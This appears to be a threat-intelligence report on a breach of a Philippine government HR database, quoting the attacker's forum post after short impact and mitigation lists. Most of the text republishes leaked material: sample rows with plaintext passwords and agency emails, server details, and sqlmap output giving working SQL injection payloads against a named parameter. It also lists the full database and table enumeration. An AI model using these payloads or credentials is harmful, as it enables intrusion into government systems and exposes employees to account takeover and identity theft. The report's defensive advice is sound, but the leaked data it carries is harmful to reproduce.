• Inventory Logs

• User Logs

• User Database

• Agency Accounts

• MySQL Logins

• PhpMyAdmin Dump

• XAMPP Logins

• Chat logs of employees have also been compromised and published

• This sensitive information could be a large-scale risk, leading to exposing of critical government infrastructure.
• It would equip malicious actors with details required to launch sophisticated ransomware attacks, exfiltrate data, and maintain persistence.
• If the leaked data is not encrypted, it could enable account takeovers.
• Commonly used passwords or weak passwords could lead to brute force attacks.
• PII (Personally Identifiable Information) of the employees belonging to the Government can be used to conduct:
  • Social engineering attacks
  • Phishing attacks
  • Identity theft

• Scan repositories to identify exposed credentials and secrets.
• Monitor cybercrime forums for the latest tactics employed by threat actors.
• Reset the compromised user login credentials and implement a strong password policy for all user accounts.
• Patch vulnerable and exploitable endpoints.
• Monitor for anomalies in user accounts, which could indicate possible account takeovers.
• Audit and monitor all logs of events and incidents to identify unusual patterns and behaviors.

155,133,3293,28,4277,HRMO,9e729eda,1,1,Zo2cU $#T1PYNMv,[email protected],2016-01-08 15:15:13,2020-07-28 14:11:40,Water district,ABULUG WATER DISTRICT (CAGAYAN),[email protected]

2177,995,3019,39,3523,HRMO,b9d8057e,1,1,6!G%FI^,[email protected],2015-10-28 08:13:06,2020-05-04 11:04:38,SUC,AGUSAN DEL SUR STATE COLLEGE OF AGRICULTURE AND TECHNOLOGY,[email protected]

514,754,2940,37,4379,HRMO,da4541c6,1,1,”; ,}-cNJM;:^*W2″,[email protected],2016-01-15 12:21:10,2020-07-09 06:42:36,<blank>,AJUY WATER DISTRICT,[email protected]

515,701,2245,37,2545,HRMO,ee4cd846,1,1,3KBZUdn]56RSj#p,[email protected],2015-11-05 10:59:42,2020-03-13 18:32:14,State College and University,AKLAN STATE UNIVERSITY,root

1647,1411,2720,30,2937,HRMO,f0e0b728,1,1,:6/wJD)c*EHPMx<,[email protected],2015-11-06 16:16:56,2020-06-25 11:52:48,Executive Office,AL-AMANAH ISLAMIC INVESTMENT BANK OF THE PHILIPPINES,[email protected]

153,418,2474,34,628,HRMO,6a5f9bad,1,1,Z7ReJGdnjw|_;Lx,[email protected],2015-10-27 09:23:52,2020-07-09 06:31:47,Water District,ALAMINOS WATER DISTRICT (LAGUNA),[email protected]

Quote:

Backend System: Windows 10

DBMS: MySQL 5.5

Hostname: WIN-NEJB836KBNF

DBMS User: ‘jmonses@localhost’

Quote:

Inventory Logs

User Logs

User Database

Agency Accounts

MySQL Logins

PhpMyAdmin Dump

XAMPP Logins

FreiChat Chat Logs

Employee Dump (includes full name, addresses, usernames, personal emails, agency and government employed emails)

And More

Quote:

.

|– cdcol

| `– cds.csv

|– csc_cdris

| |– tblref_subcat.csv

| |– tblref_subcat_topic.csv

| |– tblref_topic.csv

| |– tblresource_master.csv

| |– tblusers.csv

| |– vw_resource_master.csv

| |– vw_subcat_category.csv

| `– vw_subcat_topics.csv

|– csc_guestchat

| |– frei_banned_users.csv

| |– frei_chat.csv

| |– frei_config.csv

| |– frei_groupchat.csv

| |– frei_rooms.csv

| |– frei_session.csv

| |– frei_smileys.csv

| |– frei_video_session.csv

| |– frei_video_session.csv.1

| |– frei_webrtc.csv

| `– frei_webrtc.csv.1

|– csc_ighrsdb

| |– ref_2020inventorysummary.csv

| |– ref_2021inventorysummary_asof_aug16.csv

| |– tbl_agencyaccounts.csv

| |– tbl_agencyinventory_logs.csv

| |– tbl_personnel2.csv

| |– tbl_plantilla_jocos.csv

| |– tbl_userlogs.csv

| |– vw_agencyinventory_logs.csv

| |– vw_cscfoaccounts.csv

| `– vw_plantilla_sec_uploading_count.csv

|– csc_ighrsdb_aug312020

|– mysql

| `– user.csv

|– performance_schema

| `– accounts.csv

|– phpmyadmin

| |– pma_bookmark.csv

| |– pma_column_info.csv

| |– pma_designer_coords.csv

| |– pma_history.csv

| |– pma_pdf_pages.csv

| |– pma_recent.csv

| |– pma_relation.csv

| |– pma_table_coords.csv

| |– pma_table_info.csv

| |– pma_table_uiprefs.csv

| |– pma_tracking.csv

| |– pma_userconfig.csv

| `– pma_userconfig.csv.1

`– webauth

`– user_pwd.csv

9 directories, 46 files

– info of every PH government employee (tbl_personnel, tbl_personnel2) (firstname, lastname, gender, TIN, SSS, agency, citizenship, salary, phone#, email, v3accesskey, etc..)

– agency account logins for IGHRS panel, can manage all data from that agency

– employee chat logs

bunch more you can see below

web application technology: PHP 5.5.9, Apache 2.4.7

back-end DBMS: MySQL >= 5.5

—

Parameter: aid (GET)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: aid=3094 AND 4076=4076

Type: error-based

Title: MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)

Payload: aid=3094 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(5016=5016,1))),0x7162627671,0x78))s), 8446744073709551610, 8446744073709551610)))

Type: stacked queries

Title: MySQL >= 5.0.12 stacked queries (comment)

Payload: aid=3094;SELECT SLEEP(5)#

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: aid=3094 AND (SELECT 1742 FROM (SELECT(SLEEP(5)))SnYj)

Type: UNION query

Title: Generic UNION query (NULL) – 1 column

Payload: aid=-3023 UNION ALL SELECT CONCAT(0x71786a7871,0x5558597156435a75594377414f4c7151614d4655626d675a7a4d6f766f6466414364415972426757,0x7162627671)– –

—

+—————————————————-+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| INNODB_BUFFER_PAGE |

| INNODB_BUFFER_PAGE_LRU |

| INNODB_BUFFER_POOL_STATS |

| INNODB_CMP |

| INNODB_CMPMEM |

| INNODB_CMPMEM_RESET |

| INNODB_CMP_PER_INDEX |

| INNODB_CMP_PER_INDEX_RESET |

| INNODB_CMP_RESET |

| INNODB_FT_BEING_DELETED |

| INNODB_FT_CONFIG |

| INNODB_FT_DEFAULT_STOPWORD |

| INNODB_FT_DELETED |

| INNODB_FT_INDEX_CACHE |

| INNODB_FT_INDEX_TABLE |

| INNODB_LOCKS |

| INNODB_LOCK_WAITS |

| INNODB_METRICS |

| INNODB_SYS_COLUMNS |

| INNODB_SYS_DATAFILES |

| INNODB_SYS_FIELDS |

| INNODB_SYS_FOREIGN |

| INNODB_SYS_FOREIGN_COLS |

| INNODB_SYS_INDEXES |

| INNODB_SYS_TABLES |

| INNODB_SYS_TABLESPACES |

| INNODB_SYS_TABLESTATS |

| INNODB_TRX |

| KEY_COLUMN_USAGE |

| OPTIMIZER_TRACE |

| PARAMETERS |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLESPACES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+—————————————————-+

+—————————————————-+

| cds |

+—————————————————-+

Database: csc_cdris

+—————————————————-+

| chat |

| tblchat |

| tblmember |

| tbloffice |

| tblref_author |

| tblref_category |

| tblref_subcat |

| tblref_subcat_topic |

| tblref_topic |

| tblref_type |

| tblresource_master |

| tblusers |

| vw_resource_master |

| vw_subcat_category |

| vw_subcat_topics |

| vw_type_category |

| vw_user_accomplishment |

| vw_user_accomplishment_withtype |

+—————————————————-+

Database: csc_guestchat

+—————————————————-+

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

+—————————————————-+

+—————————————————-+

| accounts |

| cond_instances |

| events_stages_current |

| events_stages_history |

| events_stages_history_long |

| events_stages_summary_by_account_by_event_name |

| events_stages_summary_by_host_by_event_name |

| events_stages_summary_by_thread_by_event_name |

| events_stages_summary_by_user_by_event_name |

| events_stages_summary_global_by_event_name |

| events_statements_current |

| events_statements_history |

| events_statements_history_long |

| events_statements_summary_by_account_by_event_name |

| events_statements_summary_by_digest |

| events_statements_summary_by_host_by_event_name |

| events_statements_summary_by_thread_by_event_name |

| events_statements_summary_by_user_by_event_name |

| events_statements_summary_global_by_event_name |

| events_waits_current |

| events_waits_history |

| events_waits_history_long |

| events_waits_summary_by_account_by_event_name |

| events_waits_summary_by_host_by_event_name |

| events_waits_summary_by_instance |

| events_waits_summary_by_thread_by_event_name |

| events_waits_summary_by_user_by_event_name |

| events_waits_summary_global_by_event_name |

| file_instances |

+—————————————————-+

| pma_bookmark |

| pma_column_info |

| pma_designer_coords |

| pma_history |

| pma_pdf_pages |

| pma_recent |

| pma_relation |

| pma_table_coords |

| pma_table_info |

| pma_table_uiprefs |

| pma_tracking |

| pma_userconfig |

+—————————————————-+

Database: webauth

+—————————————————-+

| user_pwd |

+—————————————————-+

+—————————————————-+

| female_names |

| female_names_copy |

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

| male_names |

| ref_2020dashboardsummary |

| ref_2020inventorysummary |

| ref_2021dashboardsummary |

| ref_2021inventorysummary |

| ref_2021inventorysummary_asof_aug16 |

| ref_2021inventorysummary_byage_mar2021 |

| ref_2021plantilapersonnel_asofaug312021 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_byage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personnel |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_accessed |

| tbl_pos_annotations |

| tbl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_uploadfile |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| tblusers |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_plantilla_dtl_rpt_age |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_agencyinventory_summary4_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_personnel_manager |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personnel |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————-+

Database: mysql

+—————————————————-+

| user |

| columns_priv |

| db |

| event |

| func |

| general_log |

| help_category |

| help_keyword |

| help_relation |

| help_topic |

| innodb_index_stats |

| innodb_table_stats |

| ndb_binlog_index |

| plugin |

| proc |

| procs_priv |

| proxies_priv |

| servers |

| slave_master_info |

| slave_relay_log_info |

| slave_worker_info |

| slow_log |

| tables_priv |

| time_zone |

| time_zone_leap_second |

| time_zone_name |

| time_zone_transition |

| time_zone_transition_type |

+—————————————————-+

| file_summary_by_event_name |

| file_summary_by_instance |

| host_cache |

| hosts |

| mutex_instances |

| objects_summary_global_by_type |

| performance_timers |

| rwlock_instances |

| session_account_connect_attrs |

| session_connect_attrs |

| setup_actors |

| setup_consumers |

| setup_instruments |

| setup_objects |

| setup_timers |

| socket_instances |

| socket_summary_by_event_name |

| socket_summary_by_instance |

| table_io_waits_summary_by_index_usage |

| table_io_waits_summary_by_table |

| table_lock_waits_summary_by_table |

| threads |

| users |

+—————————————————-+

+—————————————————-+

| female_names |

| female_names_copy |

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

| male_names |

| rpt_dashboardsummary_asof08312020 |

| rpt_dashboardsummary_asofjuly10 |

| rpt_dashboardsummary_asofjuly13 |

| rpt_inventorysummary_asof08312020 |

| rpt_inventorysummary_asofjuly10 |

| rpt_inventorysummary_asofjuly13 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_withage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personnel |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_accessed |

| tbl_pos_annotations |

| tbl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_uploadfile |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| tblusers |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personnel |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————-+

Database: csc_lookupdb

+—————————————————-+

| vw\x1f_agencymaster2 |

| agency_reference |

| area_reference |

| area_type_reference |

| district_reference |

| eligibility_reference |

| level_reference |

| municipality_reference |

| pos_status_reference |

| position_reference |

| position_reference_copy |

| position_reference_nongovt |

| province_reference |

| salary_grade_reference |

| status_reference |

| tbl_citylookup |

| tbl_cscofficelookup |

| tbl_eligibilitytype |

| tbl_examcenterlookup |

| tbl_zipcode |

| tbldibar_reflookup |

| tblref_agencydept |

| tblref_agencydept_nongovt |

| tblref_agencyhrmo |

| tblref_agencyro |

| tblref_agencysector |

| tblref_agencytype |

| tblref_bloodtype |

| tblref_citizenship |

| tblref_civilstatus |

| tblref_deptagency_tmp |

| tblref_educcourses |

| tblref_educlevel |

| tblref_educschool |

| tblref_empstatus |

| tblref_regions |

| tblref_religion |

| tblref_trainingprovider |

| tblref_trainingtitle |

| vw_agencyhrmo |

| vw_agencylookup |

| vw_agencymaster |

| vw_agencyromaster |

| vw_agencysector_type |

+—————————————————-+